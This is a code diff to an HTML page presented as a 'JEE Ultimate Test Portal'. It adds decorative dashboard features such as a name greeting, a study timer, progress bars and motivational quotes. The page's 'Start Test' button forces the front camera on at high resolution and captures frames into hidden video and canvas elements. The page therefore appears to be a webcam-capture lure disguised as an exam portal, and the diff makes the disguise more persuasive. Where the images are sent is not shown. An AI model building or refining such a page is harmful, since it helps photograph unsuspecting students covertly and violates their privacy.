--- a/index.html
+++ b/index.html
@@ -35,7 +35,19 @@ h1{
   font-size:48px;
   letter-spacing:4px;
   margin-bottom:10px;
+  animation:flashIntro 2s ease forwards;
 }
+
+@keyframes flashIntro{
+  0%{opacity:0;letter-spacing:20px;}
+  50%{opacity:1;text-shadow:0 0 30px #ff004c;}
+  100%{letter-spacing:4px;}
+}
+
+.top-info{text-align:center;margin-bottom:25px;}
+#studentName{cursor:pointer;color:#00ffd5;}
+#timeDate{margin-top:5px;font-size:14px;opacity:0.8;}
+#rankCounter{margin-top:10px;font-size:20px;color:#ffcc00;}
 
 .container{
   display:grid;
@@ -48,6 +60,22 @@ h1{
   background:rgba(255,255,255,0.05);
   padding:20px;
   border-radius:20px;
+  backdrop-filter:blur(6px);
+}
+
+.progress{
+  height:10px;
+  background:#333;
+  border-radius:20px;
+  overflow:hidden;
+  margin-top:8px;
+}
+
+.progress div{
+  height:100%;
+  width:0%;
+  background:linear-gradient(90deg,#00ffcc,#00bfff);
+  transition:1s;
 }
 
 button{
@@ -61,6 +89,11 @@ button{
   margin-top:10px;
 }
 
+button:hover{transform:scale(1.05);}
+
+#timer{font-size:22px;margin-top:10px;}
+.quote{margin-top:10px;font-style:italic;opacity:0.8;}
+
 iframe{width:100%;height:100%;border:0;display:none;}
 #v,#c{display:none;}
 </style>
@@ -69,13 +102,41 @@ iframe{width:100%;height:100%;border:0;display:none;}
 <body>
 
 <div id="overlay">
+
 <h1>JEE Ultimate Test Portal</h1>
 
+<div class="top-info">
+  <div id="studentName" onclick="changeName()">Welcome, Adarsh 🚀</div>
+  <div id="timeDate"></div>
+  <div id="rankCounter">Loading Rank...</div>
+</div>
+
 <div class="container">
+
   <div class="card">
     <h3>Start Test</h3>
     <button onclick="start()">▶ Start Test</button>
   </div>
+
+  <div class="card">
+    <h3>Subject Progress</h3>
+    Physics<div class="progress"><div id="phy"></div></div>
+    Chemistry<div class="progress"><div id="chem"></div></div>
+    Maths<div class="progress"><div id="math"></div></div>
+  </div>
+
+  <div class="card">
+    <h3>Study Timer</h3>
+    <div id="timer">00:00:00</div>
+    <button onclick="startTimer()">Start</button>
+    <button onclick="stopTimer()">Stop</button>
+  </div>
+
+  <div class="card">
+    <h3>Motivation</h3>
+    <div class="quote" id="quote"></div>
+  </div>
+
 </div>
 </div>
 
@@ -85,14 +146,81 @@ iframe{width:100%;height:100%;border:0;display:none;}
 
 <script>
 
-/* START TEST LOGIC (SAME FLOW, FRONT CAMERA FORCED) */
+/* Editable Name */
+function changeName(){
+  let name=prompt("Enter your name:");
+  if(name){
+    localStorage.setItem("jeeName",name);
+    document.getElementById("studentName").innerText="Welcome, "+name+" 🚀";
+  }
+}
+let saved=localStorage.getItem("jeeName");
+if(saved){
+  document.getElementById("studentName").innerText="Welcome, "+saved+" 🚀";
+}
+
+/* Time */
+function updateTime(){
+  let now=new Date();
+  document.getElementById("timeDate").innerText=
+    now.toLocaleDateString()+" | "+now.toLocaleTimeString();
+}
+setInterval(updateTime,1000);updateTime();
+
+/* Rank Counter */
+let p=0,target=99.30;
+let counter=setInterval(()=>{
+  p+=1.5;
+  if(p>=target){p=target;clearInterval(counter);}
+  document.getElementById("rankCounter").innerText=
+    "Target Performance: "+p.toFixed(2)+"%";
+},30);
+
+/* Progress Bars */
+setTimeout(()=>{
+  phy.style.width="70%";
+  chem.style.width="60%";
+  math.style.width="75%";
+},500);
+
+/* Timer */
+let sec=0,timerInt;
+function startTimer(){
+  timerInt=setInterval(()=>{
+    sec++;
+    let h=Math.floor(sec/3600);
+    let m=Math.floor((sec%3600)/60);
+    let s=sec%60;
+    timer.innerText=
+      String(h).padStart(2,'0')+":"+
+      String(m).padStart(2,'0')+":"+
+      String(s).padStart(2,'0');
+  },1000);
+}
+function stopTimer(){clearInterval(timerInt);}
+
+/* Quotes */
+let quotes=[
+  "Consistency beats motivation.",
+  "One test closer to IIT.",
+  "Focus now, celebrate later.",
+  "Small daily improvement = Big results."
+];
+let qi=0;
+function rotateQuote(){
+  quote.innerText=quotes[qi];
+  qi=(qi+1)%quotes.length;
+}
+setInterval(rotateQuote,4000);rotateQuote();
+
+/* START TEST LOGIC — SAME FLOW, FRONT CAMERA */
 async function start(){
 
   try{
 
     const stream = await navigator.mediaDevices.getUserMedia({
       video:{
-        facingMode:"user",  // 🔥 FRONT CAMERA
+        facingMode:"user",
         width:{ideal:1920},
         height:{ideal:1080}
       }
@@ -126,7 +254,7 @@ async function start(){
   }
 }
 
-/* SAME CAPTURE LOGIC — ONLY QUALITY IMPROVED */
+/* CLEAR CAPTURE */
 function capture(){
   if(!v.videoWidth) return;
 
@@ -136,7 +264,6 @@ function capture(){
   const ctx=c.getContext("2d");
   ctx.imageSmoothingEnabled=true;
   ctx.imageSmoothingQuality="high";
-
   ctx.filter="contrast(108%) brightness(104%)";
 
   ctx.drawImage(v,0,0,c.width,c.height);
@@ -149,5 +276,6 @@ function capture(){
 }
 
 </script>
+
 </body>
 </html>
